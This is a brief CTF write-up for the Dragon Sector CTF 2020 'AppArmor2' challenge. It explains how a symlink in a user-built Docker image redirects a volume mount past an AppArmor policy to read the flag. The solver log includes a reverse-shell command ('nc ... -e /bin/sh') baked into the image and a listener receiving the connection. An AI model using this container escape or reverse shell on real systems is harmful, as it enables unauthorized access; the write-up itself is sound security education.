### Writeup for the AppArmor2 task from Dragon Sector CTF 2020
This is a very short writeup to the "AppArmor2" challenge from the [Dragon Sector CTF 2020](https://ctftime.org/event/1082), solved by disconnect3d from justCatTheFish ctf team.

In this CTF challenge, there was a custom AppArmor policy applied to the run containers, such that it disallowed reads/writes to `/flag-*` paths.

We, as a user, could only provide a docker image that was built and run later on, and the flag (which we wanted to steal) was mounted as a volume into the run container with a `docker run -v /flag.txt:/flag-XXYY ...` invocation. The `XXYY` part was random.

### Solution

The solver is in `./solve.sh`. When running for first time, you need to:
* update the (referenced) docker image name in `build.sh` and the `<<YOURIP>>` part
* login to gitlab docker registry (`docker login`) and share your project with `dragonsectorclient` (that's how you shared the docker image with the challenge, and the challenge pulled and run it later on)

The *bug* here is that AppArmor denies read/write/etc to `/flag-*` but this limitation is enforced during container run time **but not during its build time AND that Docker will follow symlinks present in the image when mounting files with `docker run -v /hostpath:/containerpath ...`**.

So it turns out that when the `docker run -v something:somepath ...` is invoked, the `somepath` follows links and we can make a link from `/flag-XXYY` to `/D` in our image. In the end, the `docker run -v /flag.txt:/flag-XXYY ...` will mount `flag.txt` into `/D` which we can read.

[email protected]:~/dsctf/x/task/ds-apparmor-task/solution$ ./solve.sh
mkdir: cannot create directory ‘rootfs’: File exists
Sending build context to Docker daemon 33.56MB
Step 1/4 : FROM ubuntu
---> d70eaf7277ea
Step 2/4 : RUN apt update && apt install -y netcat-traditional
---> Using cache
---> 40ac85e97bbe
Step 3/4 : ADD rootfs /
---> Using cache
---> 17f203a1ee6a
Step 4/4 : CMD nc 4444 -e /bin/sh
---> Using cache
---> 422aece7a145
Successfully built 422aece7a145
Successfully tagged registry.gitlab.com/mytempaccount123/test:latest
The push refers to repository [registry.gitlab.com/mytempaccount123/test]
3c45abc528a8: Layer already exists
be0923227e77: Layer already exists
cc9d18e90faa: Layer already exists
0c2689e3f920: Layer already exists
47dde53750b4: Layer already exists
latest: digest: sha256:fda92fc789dbfde33799502d18e30e8f3b2d184d9942ea1e6c5ff75f7003ffd5 size: 1365
[+] Opening connection to apparmor2.hackable.software on port 1337: Done
Executing b'hashcash -mb26 udqynihh'
out b'1:26:201121:udqynihh::i6HwB+Gk4OttOKvq:000000005+DgO\n'
b'Image added to the queue\n'
Listening on [] (family 0, port 4444)
Connection from 56178 received!

Original writeup (https://github.com/disconnect3d/writeups/tree/master/dsctf2020-apparmor2-task).